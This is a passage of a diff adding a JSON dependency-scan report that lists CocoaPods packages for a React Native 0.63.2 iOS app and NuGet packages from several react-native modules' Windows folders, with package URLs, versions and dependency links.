"pkg:cocoapods/FlipperKit@0.41.5#FlipperKitReactPlugin", + "UID": "3964fcfd1227a8e" + }, + "Version": "0.41.5", + "DependsOn": [ + "FlipperKit/Core@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FlipperKitUserDefaultsPlugin@0.41.5", + "Name": "FlipperKit/FlipperKitUserDefaultsPlugin", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitUserDefaultsPlugin", + "UID": "42fa3d46d6f06993" + }, + "Version": "0.41.5", + "DependsOn": [ + "FlipperKit/Core@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/SKIOSNetworkPlugin@0.41.5", + "Name": "FlipperKit/SKIOSNetworkPlugin", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#SKIOSNetworkPlugin", + "UID": "d0ceaa4bb584caba" + }, + "Version": "0.41.5", + "DependsOn": [ + "FlipperKit/Core@0.41.5", + "FlipperKit/FlipperKitNetworkPlugin@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Folly@2020.01.13.00", + "Name": "Folly", + "Identifier": { + "PURL": "pkg:cocoapods/Folly@2020.01.13.00", + "UID": "927129f1e3a2eaa6" + }, + "Version": "2020.01.13.00", + "DependsOn": [ + "boost-for-react-native@1.63.0", + "DoubleConversion@1.1.6", + "Folly/Default@2020.01.13.00", + "glog@0.3.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Folly/Default@2020.01.13.00", + "Name": "Folly/Default", + "Identifier": { + "PURL": "pkg:cocoapods/Folly@2020.01.13.00#Default", + "UID": "6e9df06d5f358183" + }, + "Version": "2020.01.13.00", + "DependsOn": [ + "boost-for-react-native@1.63.0", + "DoubleConversion@1.1.6", + "glog@0.3.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "OpenSSL-Universal@1.0.2.19", + "Name": "OpenSSL-Universal", + "Identifier": { + "PURL": "pkg:cocoapods/OpenSSL-Universal@1.0.2.19", + "UID": "a3c6f45406425cb7" + }, + "Version": "1.0.2.19", + "DependsOn": [ + "OpenSSL-Universal/Static@1.0.2.19" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "OpenSSL-Universal/Static@1.0.2.19", + "Name": "OpenSSL-Universal/Static", + "Identifier": { + "PURL": "pkg:cocoapods/OpenSSL-Universal@1.0.2.19#Static", + "UID": "788ed1e2f5444f54" + }, + "Version": "1.0.2.19", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "RCTRequired@0.63.2", + "Name": "RCTRequired", + "Identifier": { + "PURL": "pkg:cocoapods/RCTRequired@0.63.2", + "UID": "567b8a6549e77b82" + }, + "Version": "0.63.2", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "RCTTypeSafety@0.63.2", + "Name": "RCTTypeSafety", + "Identifier": { + "PURL": "pkg:cocoapods/RCTTypeSafety@0.63.2", + "UID": "9c0dc8ab81f02b51" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBLazyVector@0.63.2", + "Folly@2020.01.13.00", + "RCTRequired@0.63.2", + "React-Core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React@0.63.2", + "Name": "React", + "Identifier": { + "PURL": "pkg:cocoapods/React@0.63.2", + "UID": "c5a749dcd93c4258" + }, + "Version": "0.63.2", + "DependsOn": [ + "React-Core@0.63.2", + "React-Core/DevSupport@0.63.2", + "React-Core/RCTWebSocket@0.63.2", + "React-RCTActionSheet@0.63.2", + "React-RCTAnimation@0.63.2", + "React-RCTBlob@0.63.2", + "React-RCTImage@0.63.2", + "React-RCTLinking@0.63.2", + "React-RCTNetwork@0.63.2", + "React-RCTSettings@0.63.2", + "React-RCTText@0.63.2", + "React-RCTVibration@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core@0.63.2", + "Name": "React-Core", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2", + "UID": "7f7a03527e4b194" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/CoreModulesHeaders@0.63.2", + "Name": "React-Core/CoreModulesHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#CoreModulesHeaders", + "UID": "cbc638469e10b040" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/Default@0.63.2", + "Name": "React-Core/Default", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#Default", + "UID": "f1d42cd68856a81c" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/DevSupport@0.63.2", + "Name": "React-Core/DevSupport", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#DevSupport", + "UID": "3870587e0712a35e" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-Core/RCTWebSocket@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "React-jsinspector@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTActionSheetHeaders@0.63.2", + "Name": "React-Core/RCTActionSheetHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTActionSheetHeaders", + "UID": "b5cac816550d045a" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTAnimationHeaders@0.63.2", + "Name": "React-Core/RCTAnimationHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTAnimationHeaders", + "UID": "da2dfddb50ff7b30" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTBlobHeaders@0.63.2", + "Name": "React-Core/RCTBlobHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTBlobHeaders", + "UID": "8463db51201d8143" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTImageHeaders@0.63.2", + "Name": "React-Core/RCTImageHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTImageHeaders", + "UID": "b9c843ac665495da" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTLinkingHeaders@0.63.2", + "Name": "React-Core/RCTLinkingHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTLinkingHeaders", + "UID": "a5b28c3cbcfdb42f" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTNetworkHeaders@0.63.2", + "Name": "React-Core/RCTNetworkHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTNetworkHeaders", + "UID": "fd2cb5c3f34bf1f8" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTSettingsHeaders@0.63.2", + "Name": "React-Core/RCTSettingsHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTSettingsHeaders", + "UID": "7eedfdaaa2df2537" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTTextHeaders@0.63.2", + "Name": "React-Core/RCTTextHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTTextHeaders", + "UID": "e0da0248e08b321f" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTVibrationHeaders@0.63.2", + "Name": "React-Core/RCTVibrationHeaders", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTVibrationHeaders", + "UID": "72bcb6ac811b33b1" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-Core/RCTWebSocket@0.63.2", + "Name": "React-Core/RCTWebSocket", + "Identifier": { + "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTWebSocket", + "UID": "6afdba3257424d21" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-Core/Default@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2", + "React-jsiexecutor@0.63.2", + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-CoreModules@0.63.2", + "Name": "React-CoreModules", + "Identifier": { + "PURL": "pkg:cocoapods/React-CoreModules@0.63.2", + "UID": "6dc88cbd1aa42d05" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "RCTTypeSafety@0.63.2", + "React-Core/CoreModulesHeaders@0.63.2", + "React-jsi@0.63.2", + "React-RCTImage@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTActionSheet@0.63.2", + "Name": "React-RCTActionSheet", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTActionSheet@0.63.2", + "UID": "c61b3dbf7a446ec0" + }, + "Version": "0.63.2", + "DependsOn": [ + "React-Core/RCTActionSheetHeaders@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTAnimation@0.63.2", + "Name": "React-RCTAnimation", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTAnimation@0.63.2", + "UID": "3240f64ffd6189c3" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "RCTTypeSafety@0.63.2", + "React-Core/RCTAnimationHeaders@0.63.2", + "React-jsi@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTBlob@0.63.2", + "Name": "React-RCTBlob", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTBlob@0.63.2", + "UID": "47360f16457ad0e1" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "React-Core/RCTBlobHeaders@0.63.2", + "React-Core/RCTWebSocket@0.63.2", + "React-jsi@0.63.2", + "React-RCTNetwork@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTImage@0.63.2", + "Name": "React-RCTImage", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTImage@0.63.2", + "UID": "adf3d311ddc64c68" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "RCTTypeSafety@0.63.2", + "React-Core/RCTImageHeaders@0.63.2", + "React-jsi@0.63.2", + "React-RCTNetwork@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTLinking@0.63.2", + "Name": "React-RCTLinking", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTLinking@0.63.2", + "UID": "f5d586619ab3c803" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "React-Core/RCTLinkingHeaders@0.63.2", + "React-jsi@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTNetwork@0.63.2", + "Name": "React-RCTNetwork", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTNetwork@0.63.2", + "UID": "b4e740d97ec5d08f" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "RCTTypeSafety@0.63.2", + "React-Core/RCTNetworkHeaders@0.63.2", + "React-jsi@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTSettings@0.63.2", + "Name": "React-RCTSettings", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTSettings@0.63.2", + "UID": "e98a9a68771cecf4" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "RCTTypeSafety@0.63.2", + "React-Core/RCTSettingsHeaders@0.63.2", + "React-jsi@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTText@0.63.2", + "Name": "React-RCTText", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTText@0.63.2", + "UID": "ebe1fcb12cc97255" + }, + "Version": "0.63.2", + "DependsOn": [ + "React-Core/RCTTextHeaders@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-RCTVibration@0.63.2", + "Name": "React-RCTVibration", + "Identifier": { + "PURL": "pkg:cocoapods/React-RCTVibration@0.63.2", + "UID": "424335fbb9703beb" + }, + "Version": "0.63.2", + "DependsOn": [ + "FBReactNativeSpec@0.63.2", + "Folly@2020.01.13.00", + "React-Core/RCTVibrationHeaders@0.63.2", + "React-jsi@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-callinvoker@0.63.2", + "Name": "React-callinvoker", + "Identifier": { + "PURL": "pkg:cocoapods/React-callinvoker@0.63.2", + "UID": "683337d0114c2aa4" + }, + "Version": "0.63.2", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-cxxreact@0.63.2", + "Name": "React-cxxreact", + "Identifier": { + "PURL": "pkg:cocoapods/React-cxxreact@0.63.2", + "UID": "2c32cd831f02ea78" + }, + "Version": "0.63.2", + "DependsOn": [ + "boost-for-react-native@1.63.0", + "DoubleConversion@1.1.6", + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-callinvoker@0.63.2", + "React-jsinspector@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-jsi@0.63.2", + "Name": "React-jsi", + "Identifier": { + "PURL": "pkg:cocoapods/React-jsi@0.63.2", + "UID": "7b4d29c853ce2ede" + }, + "Version": "0.63.2", + "DependsOn": [ + "boost-for-react-native@1.63.0", + "DoubleConversion@1.1.6", + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-jsi/Default@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-jsi/Default@0.63.2", + "Name": "React-jsi/Default", + "Identifier": { + "PURL": "pkg:cocoapods/React-jsi@0.63.2#Default", + "UID": "7c693ebeea46d71" + }, + "Version": "0.63.2", + "DependsOn": [ + "boost-for-react-native@1.63.0", + "DoubleConversion@1.1.6", + "Folly@2020.01.13.00", + "glog@0.3.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-jsiexecutor@0.63.2", + "Name": "React-jsiexecutor", + "Identifier": { + "PURL": "pkg:cocoapods/React-jsiexecutor@0.63.2", + "UID": "f993bdb5ff7953ba" + }, + "Version": "0.63.2", + "DependsOn": [ + "DoubleConversion@1.1.6", + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "React-jsinspector@0.63.2", + "Name": "React-jsinspector", + "Identifier": { + "PURL": "pkg:cocoapods/React-jsinspector@0.63.2", + "UID": "7f254dc14fb4772f" + }, + "Version": "0.63.2", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "ReactCommon/turbomodule/core@0.63.2", + "Name": "ReactCommon/turbomodule/core", + "Identifier": { + "PURL": "pkg:cocoapods/ReactCommon@0.63.2#turbomodule/core", + "UID": "9a8a36ade2d7dd83" + }, + "Version": "0.63.2", + "DependsOn": [ + "DoubleConversion@1.1.6", + "Folly@2020.01.13.00", + "glog@0.3.5", + "React-callinvoker@0.63.2", + "React-Core@0.63.2", + "React-cxxreact@0.63.2", + "React-jsi@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Yoga@1.14.0", + "Name": "Yoga", + "Identifier": { + "PURL": "pkg:cocoapods/Yoga@1.14.0", + "UID": "e4deb58e73a7e2be" + }, + "Version": "1.14.0", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "YogaKit@1.18.1", + "Name": "YogaKit", + "Identifier": { + "PURL": "pkg:cocoapods/YogaKit@1.18.1", + "UID": "8b22a4431a699b19" + }, + "Version": "1.18.1", + "DependsOn": [ + "Yoga@1.14.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "boost-for-react-native@1.63.0", + "Name": "boost-for-react-native", + "Identifier": { + "PURL": "pkg:cocoapods/boost-for-react-native@1.63.0", + "UID": "a6b42c74fe63bad" + }, + "Version": "1.63.0", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "glog@0.3.5", + "Name": "glog", + "Identifier": { + "PURL": "pkg:cocoapods/glog@0.3.5", + "UID": "b544635d078bf508" + }, + "Version": "0.3.5", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "react-native-orientation-locker@1.2.0", + "Name": "react-native-orientation-locker", + "Identifier": { + "PURL": "pkg:cocoapods/react-native-orientation-locker@1.2.0", + "UID": "e6d13f501dbb0ac9" + }, + "Version": "1.2.0", + "DependsOn": [ + "React@0.63.2" + ], + "AnalyzedBy": "cocoapods" + } + ] + }, + { + "Target": "node_modules/react-native-orientation-locker/example/windows/example/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.UI.Xaml", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.3.191129002", + "UID": "c82075e21a681434" + }, + "Version": "2.3.191129002", + "AnalyzedBy": "nuget" + }, + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200615.7", + "UID": "e8bb3a806533ad04" + }, + "Version": "2.0.200615.7", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-orientation-locker/windows/OrientationWindows/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "80c98c31ab67824b" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-permissions/windows/RNPermissions/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", + "UID": "e1ab3ec43d9746e5" + }, + "Version": "2.0.210312.4", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-permissions/windows/RNPermissions/packages.lock.json", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "ID": "Microsoft.ReactNative@0.77.2-Fabric", + "Name": "Microsoft.ReactNative", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.ReactNative@0.77.2-Fabric", + "UID": "30bfecde8cac2575" + }, + "Version": "0.77.2-Fabric", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 11, + "EndLine": 16 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.ReactNative.Cxx@0.77.2-Fabric", + "Name": "Microsoft.ReactNative.Cxx", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.ReactNative.Cxx@0.77.2-Fabric", + "UID": "10d8c94b85e3213f" + }, + "Version": "0.77.2-Fabric", + "Relationship": "direct", + "DependsOn": [ + "Microsoft.ReactNative@0.77.2-Fabric" + ], + "Locations": [ + { + "StartLine": 17, + "EndLine": 25 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.VCRTForwarders.140@1.0.2-rc", + "Name": "Microsoft.VCRTForwarders.140", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.VCRTForwarders.140@1.0.2-rc", + "UID": "d405285e704ff195" + }, + "Version": "1.0.2-rc", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 26, + "EndLine": 31 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", + "UID": "a2c3b91d9e220db5" + }, + "Version": "2.0.230706.1", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 32, + "EndLine": 37 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.WindowsAppSDK@1.6.240923002", + "Name": "Microsoft.WindowsAppSDK", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.WindowsAppSDK@1.6.240923002", + "UID": "90d07bb0df0ada85" + }, + "Version": "1.6.240923002", + "Relationship": "direct", + "DependsOn": [ + "Microsoft.Web.WebView2@1.0.2651.64", + "Microsoft.Windows.SDK.BuildTools@10.0.22621.756" + ], + "Locations": [ + { + "StartLine": 38, + "EndLine": 47 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "boost@1.83.0", + "Name": "boost", + "Identifier": { + "PURL": "pkg:nuget/boost@1.83.0", + "UID": "4c2cda67df70e53c" + }, + "Version": "1.83.0", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 5, + "EndLine": 10 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Web.WebView2@1.0.2651.64", + "Name": "Microsoft.Web.WebView2", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.2651.64", + "UID": "1336c9ffa1113424" + }, + "Version": "1.0.2651.64", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 48, + "EndLine": 52 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Windows.SDK.BuildTools@10.0.22621.756", + "Name": "Microsoft.Windows.SDK.BuildTools", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.SDK.BuildTools@10.0.22621.756", + "UID": "e062627999c8cf72" + }, + "Version": "10.0.22621.756", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 53, + "EndLine": 57 + } + ], + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-screens/windows/RNScreens/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "c5acc4a62c55de3f" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-share/windows/ReactNativeShare/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.UI.Xaml", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.6.0", + "UID": "7b2ee6818925265f" + }, + "Version": "2.6.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", + "UID": "51a75388bdaa952b" + }, + "Version": "2.0.210312.4", + "AnalyzedBy": "nuget" + }, + { + "Name": "ReactNative.Hermes.Windows", + "Identifier": { + "PURL": "pkg:nuget/ReactNative.Hermes.Windows@0.9.0-ms.4", + "UID": "5e9324cdc5e49a87" + }, + "Version": "0.9.0-ms.4", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-sqlite-2/windows/RNSqlite2.Net46/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Data.Sqlite", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Data.Sqlite@1.1.1", + "UID": "f77351c79af72703" + }, + "Version": "1.1.1", + "AnalyzedBy": "nuget" + }, + { + "Name": "Microsoft.NETCore.Platforms", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.NETCore.Platforms@1.1.0", + "UID": "5d888ff16c996253" + }, + "Version": "1.1.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "Microsoft.Win32.Primitives", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Win32.Primitives@4.3.0", + "UID": "bad82a9f90419a79" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "NETStandard.Library", + "Identifier": { + "PURL": "pkg:nuget/NETStandard.Library@1.6.1", + "UID": "5fbbc8a01fb79e79" + }, + "Version": "1.6.1", + "AnalyzedBy": "nuget" + }, + { + "Name": "Newtonsoft.Json", + "Identifier": { + "PURL": "pkg:nuget/Newtonsoft.Json@9.0.1", + "UID": "4621b56ba40433" + }, + "Version": "9.0.1", + "AnalyzedBy": "nuget" + }, + { + "Name": "PCLStorage", + "Identifier": { + "PURL": "pkg:nuget/PCLStorage@1.0.2", + "UID": "9136bb7d86371a1a" + }, + "Version": "1.0.2", + "AnalyzedBy": "nuget" + }, + { + "Name": "SQLite", + "Identifier": { + "PURL": "pkg:nuget/SQLite@3.13.0", + "UID": "893d510c78f94575" + }, + "Version": "3.13.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.AppContext", + "Identifier": { + "PURL": "pkg:nuget/System.AppContext@4.3.0", + "UID": "c61166235bea8069" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Collections", + "Identifier": { + "PURL": "pkg:nuget/System.Collections@4.3.0", + "UID": "39ab242c8f81cb35" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Collections.Concurrent", + "Identifier": { + "PURL": "pkg:nuget/System.Collections.Concurrent@4.3.0", + "UID": "e123329e24fc173e" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Console", + "Identifier": { + "PURL": "pkg:nuget/System.Console@4.3.0", + "UID": "135fefd87ca87a97" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Diagnostics.Debug", + "Identifier": { + "PURL": "pkg:nuget/System.Diagnostics.Debug@4.3.0", + "UID": "a0703e040eef1a25" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Diagnostics.DiagnosticSource", + "Identifier": { + "PURL": "pkg:nuget/System.Diagnostics.DiagnosticSource@4.3.0", + "UID": "102a25ae3152241d" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Diagnostics.Tools", + "Identifier": { + "PURL": "pkg:nuget/System.Diagnostics.Tools@4.3.0", + "UID": "c908cb4ac905111e" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Diagnostics.Tracing", + "Identifier": { + "PURL": 